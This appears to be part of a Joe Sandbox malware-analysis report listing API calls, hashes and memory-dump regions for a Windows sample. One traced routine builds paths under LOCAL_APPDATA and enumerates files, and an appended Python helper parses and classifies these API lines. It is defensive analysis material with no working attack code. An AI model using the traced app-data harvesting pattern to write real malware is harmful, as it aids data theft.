                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                          • String ID:
                          • API String ID: 300741435-0
                          • Opcode ID: 96b09a4e0e71d7a34a07661857f40a305aeb0d0545ec37ef7e9b9dcf42eb9b9c
                          • Instruction ID: 77888505740b0cf2c37349120b5443db02dc108f8b96bb82894f1b5056085a74
                          • Opcode Fuzzy Hash: 96b09a4e0e71d7a34a07661857f40a305aeb0d0545ec37ef7e9b9dcf42eb9b9c
                          • Instruction Fuzzy Hash: 41F09A329403019BD721BBB89806F8E3FE0AF00720F6082C9F415E72D2DF645D419E5A
                          APIs
                            • Part of subcall function 00B08DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B08E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00B04F7A
                          • lstrcat.KERNEL32(?,00B11070), ref: 00B04F97
                          • lstrcat.KERNEL32(?,018A8918), ref: 00B04FAB
                          • lstrcat.KERNEL32(?,00B11074), ref: 00B04FBD
                            • Part of subcall function 00B04910: wsprintfA.USER32 ref: 00B0492C
                            • Part of subcall function 00B04910: FindFirstFileA.KERNEL32(?,?), ref: 00B04943
                            • Part of subcall function 00B04910: StrCmpCA.SHLWAPI(?,00B10FDC), ref: 00B04971
                            • Part of subcall function 00B04910: StrCmpCA.SHLWAPI(?,00B10FE0), ref: 00B04987
                            • Part of subcall function 00B04910: FindNextFileA.KERNEL32(000000FF,?), ref: 00B04B7D
                            • Part of subcall function 00B04910: FindClose.KERNEL32(000000FF), ref: 00B04B92
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                          • String ID:
                          • API String ID: 2667927680-0
                          • Opcode ID: 9574fb1f31d8c8c7892f0034889eb030c3acc7b586f70165b36f87c20cf628dc
                          • Instruction ID: b4e12ee3e7144e1f11b84c7fc7eeaa14d99ae5fabf07c95b7d95559ac8bb8585
                          • Opcode Fuzzy Hash: 9574fb1f31d8c8c7892f0034889eb030c3acc7b586f70165b36f87c20cf628dc
                          • Instruction Fuzzy Hash: 25219B76A00308A7C754F7B4DC46EE9377CAB54300F404594B6DA921D1EE7597C88BB2
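The lstrcat / FindFirstFileA entry above lists the API sequence of a path-building directory walk: SHGetFolderPathA with CSIDL 0x1C (CSIDL_LOCAL_APPDATA), four lstrcat calls, then a subcall that does wsprintfA, FindFirstFileA, two StrCmpCA comparisons against image constants, FindNextFileA and FindClose. The Python below is an added example, not part of the Joe Sandbox report or of the sample's code: it parses these "APIs" lines (copied from the entry above as constructed sample input) into structured records, tags the routine by the API pattern, resolves the CSIDL argument, and separates arguments that point into the mapped image (static strings) from those outside it (runtime-allocated buffers). IMAGE_BASE comes from the report's "Offset: 00AF0000"; IMAGE_END is an assumption chosen to cover the mapped regions the report lists; the tag names and the reading of the two StrCmpCA calls as a "." / ".." skip are this editor's interpretation, not something the report states.

```python
import re
from collections import Counter

# Constructed sample input: the "APIs" lines of the lstrcat / FindFirstFileA entry,
# copied verbatim from the Joe Sandbox function listing.
SAMPLE_APIS = """\
• Part of subcall function 00B08DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B08E0B
• lstrcat.KERNEL32(?,00000000), ref: 00B04F7A
• lstrcat.KERNEL32(?,00B11070), ref: 00B04F97
• lstrcat.KERNEL32(?,018A8918), ref: 00B04FAB
• lstrcat.KERNEL32(?,00B11074), ref: 00B04FBD
• Part of subcall function 00B04910: wsprintfA.USER32 ref: 00B0492C
• Part of subcall function 00B04910: FindFirstFileA.KERNEL32(?,?), ref: 00B04943
• Part of subcall function 00B04910: StrCmpCA.SHLWAPI(?,00B10FDC), ref: 00B04971
• Part of subcall function 00B04910: StrCmpCA.SHLWAPI(?,00B10FE0), ref: 00B04987
• Part of subcall function 00B04910: FindNextFileA.KERNEL32(000000FF,?), ref: 00B04B7D
• Part of subcall function 00B04910: FindClose.KERNEL32(000000FF), ref: 00B04B92
"""

# IMAGE_BASE is the report's "Offset: 00AF0000". IMAGE_END is an assumption: it just
# has to cover the highest mapped region listed under "Memory Dump Source" (0117A000).
IMAGE_BASE = 0x00AF0000
IMAGE_END = 0x0117B000

# CSIDL values passed to SHGetFolderPathA (documented Windows constants).
CSIDL = {0x00: "CSIDL_DESKTOP", 0x05: "CSIDL_PERSONAL", 0x10: "CSIDL_DESKTOPDIRECTORY",
         0x1A: "CSIDL_APPDATA", 0x1C: "CSIDL_LOCAL_APPDATA"}

# One report line: optional "Part of subcall function XXXXXXXX:", then API.MODULE,
# optional "(args)", then "ref: XXXXXXXX". wsprintfA has no argument list at all.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

def parse_api_refs(text):
    """Turn the report's API reference lines into dicts; unparseable lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
        calls.append({"api": m.group("api"), "module": m.group("mod"), "args": args,
                      "ref": m.group("ref"), "subcall": m.group("sub")})  # subcall None = in function itself
    return calls

def in_image(arg, base=IMAGE_BASE, end=IMAGE_END):
    """True when a hex argument points into the mapped PE image (a static string or constant)."""
    try:
        return base <= int(arg, 16) < end
    except ValueError:  # '?' or other unresolved arguments
        return False

DIR_WALK = {"FindFirstFileA", "FindNextFileA", "FindClose"}
PATH_BUILDERS = {"lstrcat", "lstrcatA", "wsprintfA", "PathCombineA", "PathAppendA"}
KNOWN_FOLDER = {"SHGetFolderPathA", "SHGetSpecialFolderPathA", "GetTempPathA"}

def classify_function(calls):
    """Tag the routine from the set of APIs it (or its subcalls) reaches."""
    names = Counter(c["api"] for c in calls)
    present = set(names)
    tags = []
    if KNOWN_FOLDER & present:
        tags.append("known-folder-root")
    if PATH_BUILDERS & present:
        tags.append("string-path-building")
    if DIR_WALK <= present:
        tags.append("directory-enumeration")
        # Two StrCmpCA calls against constants inside a Find* loop is the usual "." / ".." skip;
        # the report does not show the string contents, so this is flagged as likely, not certain.
        if names["StrCmpCA"] >= 2:
            tags.append("skips-dot-entries(likely)")
    return tags

def folder_root(calls):
    """Name of the CSIDL passed as SHGetFolderPathA's second argument, or None."""
    for c in calls:
        if c["api"] == "SHGetFolderPathA" and len(c["args"]) > 1:
            return CSIDL.get(int(c["args"][1], 16), "CSIDL_%#x" % int(c["args"][1], 16))
    return None

def constant_args(calls):
    """Split address-sized arguments into image-resident constants vs. runtime addresses."""
    static, dynamic = [], []
    for c in calls:
        for a in c["args"]:
            if not re.fullmatch(r"[0-9A-F]{8}", a) or int(a, 16) < 0x10000:
                continue  # '?' (unresolved) or a small immediate such as a handle or CSIDL
            (static if in_image(a) else dynamic).append((c["api"], a))
    return static, dynamic

if __name__ == "__main__":
    calls = parse_api_refs(SAMPLE_APIS)
    print("tags:", classify_function(calls))
    print("root:", folder_root(calls))
    static, dynamic = constant_args(calls)
    print("image constants:", static)
    print("runtime buffers:", dynamic)
```

On this entry the script reports a directory walk rooted at CSIDL_LOCAL_APPDATA, with three of the string arguments resident in the image and one (018A8918 passed to lstrcat) outside it, i.e. a path component that was built or received at run time rather than stored as a literal. That distinction is what tells an analyst which strings will show up in a static dump and which have to be recovered from the memory dumps listed above.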